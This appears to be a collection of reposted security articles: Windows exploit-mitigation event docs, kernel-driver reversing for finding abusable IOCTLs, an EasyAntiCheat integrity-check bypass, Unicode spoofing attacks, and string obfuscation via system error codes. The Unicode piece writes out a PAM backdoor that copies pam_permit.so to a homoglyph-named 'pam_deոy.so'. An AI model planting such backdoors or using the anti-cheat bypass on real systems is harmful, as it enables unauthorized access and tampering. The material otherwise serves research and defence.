FrameAddress This value is zeroed out in code, so it is unclear what its intended purpose is. ReturnAddressModuleFullPath The full path of the module that backs the ReturnAddress property (via ntdll!RtlPcToFileHeader and ntdll!LdrGetDllFullName). If ReturnAddress is not backed by a disk-backed module, this property will be empty. ProcessStartTime The creation time of the process specified in ProcessPath/ProcessId. The process time is obtained by calling NtQueryInformationProcess (https://docs.microsoft.com/en-us/windows/desktop/api/winternl/nf-winternl-ntqueryinformationprocess) with ProcessTimes as the ProcessInformationClass argument. The process time is obtained from the CreateTime field of the KERNEL_USER_TIMES structure. ThreadId The thread ID of the thread that generated the event. Event Log: Microsoft-Windows-Win32k/Operational Event ID 260 - A GDI-based font not installed in the system fonts directory was prevented from being loaded Message: “%1 attempted loading a font that is restricted by font loading policy. FontType: %2 FontPath: %3 Blocked: %4" Level: 0 (Log Always) Function that generates the event: win32kbase!EtwFontLoadAttemptEvent Description: This mitigation is detailed in this blog post (http://blogs.360.cn/post/windows10_font_security_mitigations.html). Event Properties SourceProcessName Specifies the name of the process that attempted to load the font. SourceType Refers to an undocumented W32KFontSourceType enum that, based on calls to win32kfull!ScrutinizeFontLoad, can be any of the following values: 0 - “LoadPublicFonts" - Supplied via win32kfull!bCreateSectionFromHandle() 1 - “LoadMemFonts" - Supplied via win32kfull!PUBLIC_PFTOBJ::hLoadMemFonts 2 - “LoadRemoteFonts" - Supplied via win32kfull!PUBLIC_PFTOBJ::bLoadRemoteFonts 3 - “LoadDeviceFonts" - Supplied via win32kfull!DEVICE_PFTOBJ::bLoadFonts FontSourcePath Specifies the path to the font that attempted to load. Blocked A value of 1 specifies that the font was blocked from loading.
A value of 0 indicates that the font was allowed to load but was logged. Event Log: System Event ID 5 - Control Flow Guard (CFG) Violation Event source: Microsoft-Windows-WER-Diag Message: “CFG violation is detected." Level: 0 (Log Always) Function that generates the event: werfault!CTIPlugin::NotifyCFGViolation Description: A description of the CFG mitigation can be found here (https://docs.microsoft.com/en-us/windows/desktop/SecBP/control-flow-guard). Specific event field documentation could not be completed in a reasonable amount of time. Event Properties AppPath ProcessId ProcessStartTime Is64Bit CallReturnAddress CallReturnModName CallReturnModOffset CallReturnInstructionBytesLength CallReturnInstructionBytes CallReturnBaseAddress CallReturnRegionSize CallReturnState CallReturnProtect CallReturnType TargetAddress TargetModName TargetModOffset TargetInstructionBytesLength TargetInstructionBytes TargetBaseAddress TargetRegionSize TargetState TargetProtect TargetType Sursa: https://github.com/palantir/exploitguard
-
Methodology for Static Reverse Engineering of Windows Kernel Drivers Matt Hand Apr 15 Introduction Attacks against Windows kernel mode software drivers, especially those published by third parties, have been popular with many threat groups for a number of years. Popular and well-documented examples of these vulnerabilities are the CAPCOM.sys arbitrary function execution, Win32k.sys local privilege escalation, and the EternalBlue pool corruption. Exploiting drivers offers interesting new perspectives not available to us in user mode, both through traditional exploit primitives and abusing legitimate driver functionalities. As Windows security continues to evolve, exploits in kernel mode drivers will become more important to our offensive tradecraft. To aid in the research of these vulnerabilities, I felt it was important to demonstrate the kernel bug hunting methodology I have employed in my research to find interesting and abusable functionality. In this post, I'll first cover the most important pieces of prerequisite knowledge required to understand how drivers work and then we'll jump into the disassembler to walk through finding the potentially vulnerable internal functions. Note: This will include gross oversimplifications of complex topics. I will include links along the way to additional resources, but a full post on driver development and internals would be far too long and not immediately relevant. Target Identification & Selection The first thing I typically look for on an engagement is what drivers are loaded on the base workstation and server images. If a bug is found in these core drivers, most of the fleet will be affected. This also has the added bonus of not requiring a new driver to be dropped and loaded, which could tip off defenders. To do this, I will either manually review drivers in the registry (HKLM\System\ControlSet\Services\ where Type is 0x1 and ImagePath contains *.sys) or use tooling like DriverQuery to run through C2.
Target selection is a mixed bag because there isn't one specific type of driver that is more vulnerable than others. That being said, I will typically look at drivers published by security vendors, anything published by the motherboard manufacturer, and performance monitoring software. I tend to exclude drivers published by Microsoft only because I usually don't have the time required to really dig in. Driver Internals Primer Kernel mode software drivers seem far more complex than they truly are if you haven't developed one before. There are 3 important concepts that you must first understand before we start reversing — DriverEntry, IRP handlers, and IOCTLs. DriverEntry Much like the main() function that you may be familiar with in C/C++ programming, a driver must specify an entry point, DriverEntry. DriverEntry has many responsibilities, such as creating the device object and symbolic link used for communication with the driver and defining key functions (IRP handlers, unload functions, callback routines, etc.). DriverEntry first creates the device object with a call to IoCreateDevice() or IoCreateDeviceSecure(), the latter typically being used to apply a security descriptor to the device object in order to restrict access to only local administrators and NT AUTHORITY\SYSTEM. Next, DriverEntry uses IoCreateSymbolicLink() with the previously created device object to set up a symbolic link which will allow user mode processes to communicate with the driver. Here's how this looks in code (shown as a screenshot in the original post). The last thing that DriverEntry does is define the functions for the IRP handlers. IRP Handlers I/O Request Packets (IRPs) are essentially just instructions for the driver. These packets allow the driver to act on the specific major function by providing the relevant information required by the function. There are many major function codes, but the most common ones are IRP_MJ_CREATE, IRP_MJ_CLOSE, and IRP_MJ_DEVICE_CONTROL.
These correlate with user mode functions:

IRP_MJ_CREATE → CreateFile
IRP_MJ_CLOSE → CloseHandle
IRP_MJ_DEVICE_CONTROL → DeviceIoControl

Definitions in DriverEntry may look like this:

DriverObject->MajorFunction[IRP_MJ_CREATE] = MyCreateCloseFunction;
DriverObject->MajorFunction[IRP_MJ_CLOSE] = MyCreateCloseFunction;
DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = MyDeviceControlFunction;

When the following code in user mode is executed, the driver will receive an IRP with the major function code IRP_MJ_CREATE and will execute the MyCreateCloseFunction function:

hDevice = CreateFile(L"\\\\.\\MyDevice", GENERIC_WRITE|GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

The most important major function for us in almost all cases will be IRP_MJ_DEVICE_CONTROL, as it is used to send requests to perform a specific internal function from user mode. These requests include an IO Control Code which tells the driver exactly what to do, as well as a buffer to send data to and receive data from the driver. IOCTLs IO Control Codes (IOCTLs) are our primary search target, as they include numerous important details we need to know. They are represented as DWORDs, but groups of bits within the 32-bit value encode details about the request — Device Type, Required Access, Function Code, and Transfer Type. Microsoft created a visual diagram to break these fields down: Transfer Type - Defines the way that data will be passed to the driver. These can either be METHOD_BUFFERED, METHOD_IN_DIRECT, METHOD_OUT_DIRECT, or METHOD_NEITHER. Function Code - The internal function to be executed by the driver. These are supposed to start at 0x800, but you will see many starting at 0x0 in practice. The Custom bit is used for vendor-assigned values. Device Type - The type of the driver's device object specified during IoCreateDevice(Secure)(). There are many device types defined in Wdm.h and Ntddk.h, but one of the most common to see for software drivers is FILE_DEVICE_UNKNOWN (0x22).
The Common bit is used for vendor-assigned values. An example of what these are defined as in the driver's headers is:

#define MYDRIVER_IOCTL_DOSOMETHING CTL_CODE(0x8000, 0x800, METHOD_BUFFERED, FILE_ANY_ACCESS)

It is entirely possible to decode these values yourself, but if you're feeling lazy like I often am, OSR has their online decoder and the !ioctldecode Windbg extension has worked great for me in a pinch. These specifics will become more important when we write the application to interface with the target driver. In the disassembler, they will still be represented in hex. Putting it all Together I know it's like drinking from the firehose, but you can simplify it and think about it like sending a network packet. You craft the packet with whatever details you need, send it to the server for processing, it does something with it or ignores you, and then gives you back something. Here's an oversimplified diagram of how IOCTLs are sent and processed:

1. The user mode application gets a handle on the symlink.
2. The user mode application uses DeviceIoControl() to send the required IOCTL and input/output buffers to the symlink.
3. The symlink points to the driver's device object and allows the driver to receive the user mode application's packet (IRP).
4. The driver sees that the packet came from DeviceIoControl(), so it passes it to the defined internal function, MyCtlFunction().
5. MyCtlFunction() maps the function code, 0x800, to the internal function SomeFunction().
6. SomeFunction() executes.
7. The IRP is completed and the status is passed back to the user, along with anything the driver has for the user in the output buffer supplied by the user mode application.

Note: I didn't talk about IRP completion, but just know that it can/will happen once SomeFunction() returns, will include the status code returned by the function, and will mark the end of the action.
Disassembling the Driver Now that we understand the key structures we're going to be looking for, it's time to start digging into the target driver. I'll be showing how to do this in Ghidra as I'm more comfortable in it, but the exact same methodology works in IDA. Once we have the driver that we'd like to target downloaded on our analysis system, it's time to start looking for the IRP handlers that will point us to the potentially interesting functions. The Setup Since Ghidra doesn't include many of the symbols we need for analyzing drivers at the time of writing this post (although it once did 🤔), we'll need to find a way to get those imported somehow. Thankfully, this process is relatively simple thanks to some great work done by 0x6d696368 (Mich). Ghidra supports datatypes in the Ghidra Data Type Archive (GDT) format, which are packed binary files containing symbols derived from the chosen headers, whether those be custom or Microsoft-supplied. There isn't any great documentation about generating these and it does require some manual tinkering, but thankfully Mich took care of all of that for us. On their GitHub project is a precompiled GDT for Ntddk.h and Wdm.h, ntddk_64.gdt. Download that file on the system you're going to run Ghidra on. To import and begin using the GDT file, open the driver you want to start analyzing, click the Down Arrow (▼) in the Data Type Manager and select "Open File Archive." Then select the ntddk_64.gdt file you downloaded earlier and open it. In your Data Type Manager window, you'll now have a new item, "ntddk_64." Right-click on it and choose "Apply Function Data Types." This will update the decompiler and you'll see a change in many of the function signatures. Finding DriverEntry Now that we've got our datatypes sorted, we next need to identify the driver object. This is trivial to find as it is the first parameter in DriverEntry. First, open the driver in Ghidra and do the initial auto analysis.
Under the Symbol Tree window, expand the Exports item and there will be a function called entry. Note: There may be a GsDriverEntry function in some cases that will look like a call to 2 unnamed functions. This is a result of the developer using the /GS compiler flag, which sets up the stack cookies. One of the functions is the real driver entry, so check the longer of the 2. Finding the IRP Handlers The first thing we are going to need to look for is a series of offsets from the driver object. These are related to the attributes of the nt!_DRIVER_OBJECT structure. The one that we are most interested in is the MajorFunction table (+0x70). This becomes a lot easier with our newly-applied symbols. Since we know that the first parameter of DriverEntry is a pointer to a driver object, we can click the parameter in the decompiler and press CTRL+L to bring up the Data Type Chooser. Search for PDRIVER_OBJECT and click OK. This will change the type of the parameter to match its true type. Note: I like to change the name of the parameter to DriverObject to help me while walking the function. To do this yourself, click the parameter, press "L", and type in the name you want to use. Now that we have the appropriate type, it's time to start looking for the offset to the MajorFunction table. Sometimes you may see this right in the DriverEntry function, but other times you'll see the driver object being passed as a parameter to another internal function. Start looking for occurrences of the DriverObject variable. This is really easy if you have a mouse. Just click the mouse wheel over the variable to highlight all instances of the variable in the decompiler. In the example I am working with, I don't see references to offsets from the driver object, but I do see it being passed to another function. Jump into this function, FUN_00011060, and retype the first parameter to a PDRIVER_OBJECT since we know that's what DriverEntry shows as its only parameter.
Then again start searching for references to offsets from the DriverObject variable. Here's what we're looking for: In vanilla Ghidra, we'd see these as less detailed offsets from the DriverObject, but since we applied the NTDDK datatypes, it's a lot cleaner. So now that we've found the offsets from DriverObject marking the MajorFunction table, what is at the indexes (0, 2, 0xe)? These offsets are defined in the WDM headers (wdm.h) and represent the IRP major function codes. In our example the driver handles 3 major function codes — IRP_MJ_CREATE, IRP_MJ_CLOSE, and IRP_MJ_DEVICE_CONTROL. The first 2 aren't really of interest to us, but IRP_MJ_DEVICE_CONTROL is very important. This is because the function defined at that offset (0x104bc) is what processes requests made from usermode using DeviceIoControl and its included I/O Control Codes (IOCTLs). Let's dig into this function. Double-click the offset for MajorFunction[0xe]. This will take you to the function at offset 0x104bc in the driver. The second parameter of this function, and all device I/O control IRP handlers, is a pointer to an IRP. We can again use CTRL+L to retype the second parameter to PIRP (and optionally rename it). The IRP structure is incredibly complex and even with the help of our new type definitions, we still won't be able to pinpoint everything. The first and most important thing we are going to want to look for is IOCTLs. These will be represented as DWORDs inside the decompiler, but we need to know which variable they're assigned to. To figure that out, we'll need to rely on our old friend WinDbg. The first offset from our IRP that we can see is IRP->Tail + 0x40. Let's dig into the IRP structure a bit. We can see that Tail begins at offset +0x78, but what is 0x40 bytes beyond that? Using WinDbg, we can see that CurrentStackLocation is at offset +0x40 from Irp->Tail, but it only shows as a pointer. Microsoft gives us a hint that this is a pointer to a _IO_STACK_LOCATION structure.
So in our decompiler, we can rename lVar2 to CurrentStackLocation. Following this new variable, we want to find a reference to offset +0x18, which is the IOCTL. Rename this variable to something memorable if you’d like. Now that we’ve found the variable holding the IOCTL, we should be able to see it being compared to a whole bunch of DWORDs. These comparisons are the driver checking for the IOCTLs that it can handle. After each comparison will most likely be an internal function call. These are what will be executed when that specific IOCTL is sent to the driver from user mode! In the above example, when the driver receives IOCTL 0x8000204c, it will execute FUN_0000944c (some type of printing function) and FUN_000100d0. The Short Story That was a large amount of information, but in practice it is very simple. My workflow is: Follow the first parameter of DriverEntry, the driver object, until I find offsets indicating the MajorFunction table. Look for an offset at MajorFunction[0xe], marking the DeviceIoControl IRP handler. Follow the second parameter of this function, PIRP, until I find PIRP->Tail +0x40, marking the CurrentStackLocation. Find offset +0x18 from CurrentStackLocation, which will be the IOCTLs In a lot of cases, I will just skip steps 3 and 4 and just look through the decompiler for a long chain of DWORD comparisons. If I’m really feeling lazy, I’ll look for calls to IofCompleteRequest and just scroll up from the calls looking for the DWORD comparisons 🤐 Function Reversing Now that we know which functions will execute internally when the driver receives an IOCTL, we can begin reversing those functions to find interesting functionalities. Because this differs so much between drivers, there’s no real sense in covering this process (there’s also books written about this stuff). 
My typical workflow at this point is to look for interesting API calls inside of these functions, determine what they require for input, and then use a simple user mode client (I use a generic template that I copy and modify depending on the target) to send the IRPs. When analyzing EDR drivers, I also like to look through the capabilities they've baked in, such as process object handler callbacks. There are some great driver bug walkthroughs that can help spark some ideas (this is one of my favorites). The one important thing of note, especially when working with Ghidra, is this variable declaration: If you were to look at this in WinDbg, you'd see that at this offset is a pointer to MasterIrp. What you're actually seeing is a union with IRP->SystemBuffer, and this variable is actually the METHOD_BUFFERED data structure. This is why you'll oftentimes see it being passed into internal functions as a parameter. Make sure to treat this as an input/output buffer while reversing internal functions. Good luck and happy hunting 😈 Thanks to Andy Robbins. Sursa: https://posts.specterops.io/methodology-for-static-reverse-engineering-of-windows-kernel-drivers-3115b2efed83
-
Come to our talk and find out, what state-of-the-art fuzzing technologies have to offer, and what is yet to come. This talk will feature demos, CVEs, and a release, as well as lots of stuff we learned over the last four years of fuzzing research. By Cornelius Aschermann and Sergej Schumilo Full Abstract & Presentation Materials: https://www.blackhat.com/eu-19/briefi...
-
FinDOM-XSS FinDOM-XSS is a tool that allows you to find possible and/or potential DOM-based XSS vulnerabilities in a fast manner. Installation

$ git clone git@github.com:dwisiswant0/findom-xss.git

Dependencies: LinkFinder Configuration Change the value of the LINKFINDER variable (on line 3) to point to your main LinkFinder file. Usage To run the tool on a target, just use the following command.

$ ./findom-xss.sh https://target.host/about-us.html

This will run the tool against target.host. Or if you have a list of targets you want to scan:

$ cat urls.txt | xargs -I % ./findom-xss.sh %

The second argument can be used to specify an output file.

$ ./findom-xss.sh https://target.host/about-us.html /path/to/output.txt

By default, output will be stored in the results/ directory in the repository under the name target.host.txt. License FinDOM-XSS is licensed under the Apache License. Take a look at the LICENSE for more information. Thanks @dark_warlord14 - Inspired by the JSScanner tool, which is why this tool was made. @aslanewre - With possible patterns. Sursa: https://github.com/dwisiswant0/findom-xss
-
Apr 8, 2020 :: iPower :: [ easy-anti-cheat, anti-cheats, game-hacking ] CVEAC-2020: Bypassing EasyAntiCheat integrity checks Introduction Cheat developers have specific interest in anti-cheat self-integrity checks. If you can circumvent them, you can effectively patch out or “hook” any anti-cheat code that could lead to a kick or even a ban. In EasyAntiCheat’s case, they use a kernel-mode driver which contains some interesting detection routines. We are going to examine how their integrity checks work and how to circumvent them, effectively allowing us to disable the anti-cheat. Reversing process [1] EPT stands for Extended Page Tables. It is a technology from Intel for MMU virtualization support. Check out Daax’s hypervisor development series if you want to learn more about virtualization. The first thing to do is actually determine if there is any sort of integrity check. The easiest way is to patch any byte from .text and see if the anti-cheat decides to kick or ban you after some time. About 10-40 seconds after I patched a random function, I was kicked, revealing that they are indeed doing integrity checks in their kernel module. With the assistance of my hypervisor-based debugger, which makes use of EPT facilities [1], I set a memory breakpoint on a function that was called by their LoadImage notify routine (see PsSetLoadImageNotifyRoutine). After some time, I could find where they were accessing memory. After examining xrefs in IDA Pro and setting some instruction breakpoints, I discovered where the integrity check function gets called from, one of them being inside the CreateProcess notify routine (see PsSetCreateProcessNotifyRoutine). This routine takes care of some parts of the anti-cheat initialization, such as creating internal structures that will be used to represent the game process. EAC won’t initialize if it finds out that their kernel module has been tampered with. 
The integrity check function itself is obfuscated, mainly containing junk instructions, which makes analyzing it very annoying. Here’s an example of obfuscated code:

mov [rsp+arg_8], rbx
ror r9w, 2
lea r9, ds:588F66C5h[rdx*4]
sar r9d, cl
bts r9, 1Fh
mov [rsp+arg_10], rbp
lea r9, ds:0FFFFFFFFC17008A9h[rsi*2]
sbb r9d, 2003FCE1h
shrd r9w, cx, cl
shl r9w, cl
mov [rsp+arg_18], rsi
cmc
mov r9, cs:EasyAntiCheatBase

With the assistance of Capstone, an open-source disassembly framework, I wrote a simple tool that disassembles every instruction from a block of code and keeps track of register modifications. After that, it finds out which instructions are useless based on register usage and removes them. Example of output:

mov [rsp+arg_8], rbx
mov [rsp+arg_10], rbp
mov [rsp+arg_18], rsi
mov r9, cs:EasyAntiCheatBase

Time to reverse this guy!

The integrity check function

This is the C++ code for the integrity check function:

bool check_driver_integrity()
{
    if ( !peac_base || !eac_size || !peac_driver_copy_base || !peac_copy_nt_headers )
        return false;

    bool not_modified = true;

    const auto num_sections = peac_copy_nt_headers->FileHeader.NumberOfSections;
    const auto* psection_headers = IMAGE_FIRST_SECTION( peac_copy_nt_headers );

    // Loop through all sections from EasyAntiCheat.sys
    for ( WORD i = 0; i < num_sections; ++i )
    {
        const auto characteristics = psection_headers[ i ].Characteristics;

        // Ignore paged sections
        if ( psection_headers[ i ].SizeOfRawData != 0 && READABLE_NOT_PAGED_SECTION( characteristics ) )
        {
            // Skip .rdata and writable sections
            if ( !WRITABLE_SECTION( characteristics ) && ( *reinterpret_cast< ULONG* >( psection_headers[ i ].Name ) != 'adr.'
) )
            {
                auto psection = reinterpret_cast< const void* >( peac_base + psection_headers[ i ].VirtualAddress );
                auto psection_copy = reinterpret_cast< const void* >( peac_driver_copy_base + psection_headers[ i ].VirtualAddress );
                const auto virtual_size = psection_headers[ i ].VirtualSize & 0xFFFFFFF0;

                // Compare the original section with its copy
                if ( memcmp( psection, psection_copy, virtual_size ) != 0 )
                {
                    // Uh oh
                    not_modified = false;
                    break;
                }
            }
        }
    }

    return not_modified;
}

As you can see, EAC allocates a pool and makes a copy of itself (you can check that by yourself) that will be used in their integrity check. It compares the bytes from EAC.sys with its copy and sees if both match. It returns false if the module was patched.

The work-around

Since the integrity check function is obfuscated, it would be pretty annoying to find it because it is subject to change between releases. Wanting the bypass to be simple, I began brainstorming some alternative solutions. The .pdata section contains an array of function table entries, which are required for exception handling purposes. As the semantics of the function itself are unlikely to change, we can take advantage of this information! In order to make the solution cleaner, we need to patch EasyAntiCheat.sys and its copy to disable the integrity checks. To find the pool containing the copy, we can use the undocumented API ZwQuerySystemInformation and pass SystemBigPoolInformation (0x42) as the first argument. When the call is successful, it returns a SYSTEM_BIGPOOL_INFORMATION structure, which contains an array of SYSTEM_BIGPOOL_ENTRY structures and the number of elements returned in that array. The SYSTEM_BIGPOOL_ENTRY structure contains information about the pool itself, like its pool tag, base and size. Using this information, we can find the pool that was allocated by EAC and modify its contents, granting us the unhindered ability to patch any EAC code without triggering integrity violations.
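The junk-instruction cleanup described earlier (the author's tool uses Capstone on real instruction encodings) can be approximated with a simplified, pure-Python backward liveness pass over the textual listing. This is only a sketch of the idea, not the author's tool; the register aliases and the "mov fully redefines its destination" rule are deliberate simplifications:

```python
import re

REGS = {"rax", "rbx", "rcx", "rdx", "rsi", "rdi", "rbp", "rsp",
        "r8", "r9", "r10", "r11"}
ALIASES = {"r9w": "r9", "r9d": "r9", "cx": "rcx", "cl": "rcx"}

def canon(tok):
    """Map sub-registers (r9w, r9d, cl, ...) onto their full register."""
    return ALIASES.get(tok, tok)

def regs_in(text):
    return {canon(t) for t in re.findall(r"[A-Za-z_0-9]+", text)
            if canon(t) in REGS}

def junk_filter(block, live_at_exit):
    """Backward liveness pass: an instruction whose destination register is
    never read again before being fully redefined is junk and is dropped.
    Stores to memory are always kept; 'mov reg, x' fully redefines reg."""
    live = set(live_at_exit)
    kept = []
    for line in reversed(block):
        mnem, _, ops = line.partition(" ")
        operands = [o.strip() for o in ops.split(",")]
        dest = operands[0]
        if dest.startswith("["):          # store to memory: real work
            kept.append(line)
            live |= regs_in(ops)
        else:
            rd = canon(dest)
            if rd not in live:            # result never used: junk
                continue
            kept.append(line)
            if mnem == "mov":             # full redefinition of rd
                live.discard(rd)
            live |= regs_in(" ".join(operands[1:]))
    return list(reversed(kept))

block = [
    "mov [rsp+arg_8], rbx",
    "ror r9w, 2",
    "lea r9, ds:588F66C5h[rdx*4]",
    "sar r9d, cl",
    "bts r9, 1Fh",
    "mov [rsp+arg_10], rbp",
    "lea r9, ds:0FFFFFFFFC17008A9h[rsi*2]",
    "sbb r9d, 2003FCE1h",
    "shrd r9w, cx, cl",
    "shl r9w, cl",
    "mov [rsp+arg_18], rsi",
    "cmc",
    "mov r9, cs:EasyAntiCheatBase",
]
```

Run on the obfuscated block above with r9 live at exit, it keeps exactly the three stack stores and the final load of EasyAntiCheatBase.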
Proof of Concept PoC code is released here. It contains the bypass for the integrity check and a patch to a function that’s called by their pre-operation callbacks (registered by ObRegisterCallbacks), letting you create handles to the target process. I’m aware that this is by no means an ideal solution, because you’d need to take care of other things, like handle enumeration, but I’ll leave this as an exercise for the reader. You are free to improve this example to suit your needs. The tests were made on four different games: Rust, Apex Legends, Ironsight and Cuisine Royale. Have fun! See you in the next article! Sursa: https://secret.club/2020/04/08/eac_integrity_check_bypass.html
-
Hacking The Web With Unicode Confuse, Spoof and Make Backdoors. Vickie Li Apr 12 · 4 min read Unicode was developed to represent all of the world’s languages on the computer. Early in the history of computers, characters were encoded by assigning a number to each one. This encoding system was not adequate since it did not cover many languages besides English, and it was impossible to type the majority of languages in the world. Then the Unicode standard emerged. The Unicode standard consists of a set of code charts for a visual reference of what the character looks like and a corresponding “code” for each unique character. See the chart above! And now, the world’s languages can be typed and transmitted easily using the computer! Visual Spoofing However, the adoption of Unicode has also introduced a whole host of attack vectors onto the Internet. And today, let’s talk about some of these issues! Unicode phishing One of the main issues is that some characters of different languages look identical or are very similar to each other. A Α А ᗅ ᗋ ᴀ A These characters all look alike, but they all have a different encoding under the Unicode system. Therefore, they are all completely different as far as the computer is concerned. Attackers can exploit this during a phishing attack because users put a lot of trust in domain names. When you see a trusted domain name, like “google.com” in your URL bar, you immediately trust the website that you are visiting. Attackers can take advantage of this trust by registering a domain name that looks like the trusted one, for example, “goōgle.com”. In this case, victims can easily overlook the additional marking on the “o”, trust that they are indeed on Google’s website, and provide the fraudulent site their Google credentials. Spoofing domain names this way can also help attackers lure victims to their site. For example, attackers can post a link “images.goōgle.com/puppies” on a social media site. 
She gets her victims to think that the link redirects to a puppy photo on Google when it really redirects to a page that auto-downloads malware. Bypassing word filters Unicode can also be used to bypass profanity filters. When an email list or forum uses profanity filters and prevents users from using profanities like “*sshole”, the filter can be easily bypassed by using lookalike Unicode characters, like “*sshōle”. Spoofing file extensions Another interesting exploit utilizes the Unicode character (U+202E), which is the “right-to-left override” character. This character visually reverses the direction of the text that comes after the character. For example, the string “harmless(U+202E)txt.exe” will appear on the screen as “harmlessexe.txt”. This can cause users to believe that the file is a harmless text file, while they are actually downloading and opening an executable file. Unicode Backdoors Just what else could be done using the visual spoofing capabilities of Unicode? Quite a lot, as it turns out! Unicode can also be used to hide backdoors in scripts. Let’s look at how attackers can use Unicode to make their manipulations of files (nearly) undetectable! There is a script in Linux systems that handles authentication: /etc/pam.d/common-auth. And the file contains these lines: [...] auth [success=1 default=ignore] pam_unix.so nullok_secure # here's the fallback if no module succeeds auth requisite pam_deny.so [...] auth required pam_permit.so [...] The script first checks the user’s password. Then if the password check fails, pam_deny.so is executed, making the authentication fail. Otherwise, pam_permit.so is executed, and the authentication will succeed. So what can an attacker do if she gains temporary access to the system? First, she can copy the contents of pam_permit.so to a new file, “pam_deոy.so”, whose filename looks like pam_deny.so visually. 
cp /lib/*/security/pam_permit.so /lib/security/pam_deոy.so Then, she can modify /etc/pam.d/common-auth to use the newly created “pam_deոy.so” should the password checking fail: [...] auth [success=1 default=ignore] pam_unix.so nullok_secure # here's the fallback if no module succeeds auth requisite pam_deոy.so [...] auth required pam_permit.so [...] Now, authentication will succeed regardless of the result of the password check, since both “pam_permit.so” and “pam_deոy.so” contain the script that makes authentication succeed. And since “n” and “ո” look alike in many terminal fonts, /etc/pam.d/common-auth will look very much like the original when viewed with cat, less or a text editor. Furthermore, the contents of the original pam_deny.so were not modified at all, and still contain the code that makes authentication fail. This backdoor is therefore extremely difficult to detect even if the system administrator carefully inspects the contents of both /etc/pam.d/common-auth and pam_deny.so. Tools Here is a tool that you can use to test out some of these Unicode attacks: Homoglyph Attack Generator Homoglyph Attack Generator and Punycode Converter This app is meant to make it easier to generate homographs based on… www.irongeek.com One way that you can protect yourself against Unicode attacks is to make sure that you scan any text string that looks suspect with a Unicode detector. For example, you can use these tools to detect Unicode: Unicode Character Detector With this simple tool, you can instantly identify GSM characters and Unicode symbols in your text messages. Characters… www.textmagic.com Unicode Lookup Unicode Lookup is an online reference tool to lookup Unicode and HTML special characters, by name and number, and… unicodelookup.com Conclusion Unicode has introduced many new attack vectors onto the Internet. Fortunately, most websites and applications are now noticing the dangers that Unicode characters pose, and are taking action against these attacks! 
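As a complement to the detector tools listed above, a minimal homemade check is only a few lines of Python with the standard unicodedata module: one function flags non-ASCII characters hiding in a line that should be pure ASCII (catching the fake pam_deոy.so, whose "ո" is U+0578), and another strips BiDi control characters such as the U+202E right-to-left override before trusting a file extension. This is just an illustrative sketch:

```python
import os
import unicodedata

# The Unicode bidirectional-control characters, including U+202E (RLO).
BIDI_CONTROLS = "\u202A\u202B\u202C\u202D\u202E\u2066\u2067\u2068\u2069"

def flag_homoglyphs(line):
    """Report any non-ASCII character hiding in a line that should be
    pure ASCII: its position, the character, and its Unicode name."""
    return [(i, ch, unicodedata.name(ch, "UNKNOWN"))
            for i, ch in enumerate(line) if ord(ch) > 0x7F]

def real_extension(name):
    """Strip BiDi control characters before trusting what the user saw."""
    cleaned = "".join(ch for ch in name if ch not in BIDI_CONTROLS)
    return os.path.splitext(cleaned)[1]

clean = "auth requisite pam_deny.so"
dirty = "auth requisite pam_de\u0578y.so"   # U+0578 instead of "n"
spoofed = "harmless\u202Etxt.exe"           # displays as harmlessexe.txt
```

flag_homoglyphs(dirty) pinpoints the Armenian letter by name, and real_extension(spoofed) reveals that the "text file" actually ends in .exe.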
Some applications prevent users from using certain character sets, while others display odd Unicode characters in the form of a question mark “�” or a block character “□”. Is your application protected against Unicode attacks? Thanks for reading. Follow me on Twitter for more posts like this one. Sursa: https://medium.com/swlh/hacking-the-web-with-unicode-73d0f0c97aab
-
Ebfuscation: Abusing system errors for binary obfuscation Introduction In this post I'm going to try to explain a new obfuscation technique I've come up with (at least I have not seen it before; if there is documentation about this, I would be grateful to receive it :D). First of all, let me clarify that I am not an expert in obfuscation techniques and that some terms I use may not be used correctly. Software obfuscation is related to both computer security and cryptography. Obfuscation is closely related to steganography, a branch of cryptography that studies how to transfer secrets stealthily. Obfuscation does not guarantee the protection of your secret forever, unlike encryption, where a key is needed to discover the secret. What obfuscation does is make your secret more difficult to access, gaining you the time necessary to benefit from it. There are many applications of obfuscation, both for people who are dedicated to doing good and for people who are dedicated to doing evil. In the case of video games, it helps keep the game from being hacked during the first weeks after its release (when video game companies get the maximum of their earnings). In the case of malware, it increases the time it takes for a reverse engineer to understand the behavior of the malware, which means that it can infect more computers until protection measures can be developed for it. Basically, an obfuscator receives a program as input, applies a series of transformations to it, and returns another program that has the same functionality as the input program. Here are other transformations that can be applied: - Virtualization - Control Flow Flattening - Encode literals - Opaque predicates - Encode Arithmetic ... This technique doesn't pretend to be the best of all obfuscation techniques; it's just a fun way I've come up with to obfuscate data. What is Ebfuscation? 
Ebfuscation is a technique which can be used to implement different transformations such as literals encoding, control flow flattening and virtualization. The technique is based on system errors. To understand what "based on system errors" means, let's see an example. The following example is based on the Encode literals transformation. (At the end of this post there is a proof of concept, where I implemented an obfuscator, for C programs, using the Ebfuscation technique for strings.) Given the following C program:

int check_input(void)
{
    char input[101] = { 0 };
    char * passwd = "password123";

    printf("Enter a password: ");
    fgets(input, 50, stdin);

    if (strncmp(input, passwd, strnlen(passwd, 11)) == 0) {
        return 1;
    }

    return 0;
}

int main(int argc, char *argv[])
{
    if (check_input() == 1) {
        char * valid_pass = "Well done!";
        printf("%s\n", valid_pass);
    } else {
        char * invalid_pass = "Try again!";
        printf("%s\n", invalid_pass);
    }

    return 0;
}

We want to protect the literal stored in the variable passwd ("password123"). To do this, we take each character as a byte, and we generate the code needed to produce the system error which corresponds to that byte. Let's see an example for the character "p" from "password123".

"p" -> 112 -> generate_error_112()

The function generate_error_112() is an abstraction, since its implementation differs depending on the system on which you want to generate error 112. For example, to generate system error code 3:
On Linux:

/* 0x03 == ESRCH == No such process */
void generate_error_3()
{
    kill(-9999, 0);
}

On Windows:

/* 0x03 == ERROR_PATH_NOT_FOUND */
void generate_error_3(void)
{
    CreateFile(
        "C:\\Non\\Existent\\Directory\\By\\D00RT",
        GENERIC_READ | GENERIC_WRITE,
        0,
        NULL,
        OPEN_EXISTING,
        0,
        NULL
    );
}

Then, the previous program, after applying the transformation, is equivalent to the following program:

int check_input(void)
{
    char input[101] = { 0 };
    char passwd[12];

    generate_error_112(); /*p*/
    passwd[0] = get_last_error();
    generate_error_97(); /*a*/
    passwd[1] = get_last_error();
    generate_error_115(); /*s*/
    passwd[2] = get_last_error();
    generate_error_115(); /*s*/
    passwd[3] = get_last_error();
    generate_error_119(); /*w*/
    passwd[4] = get_last_error();
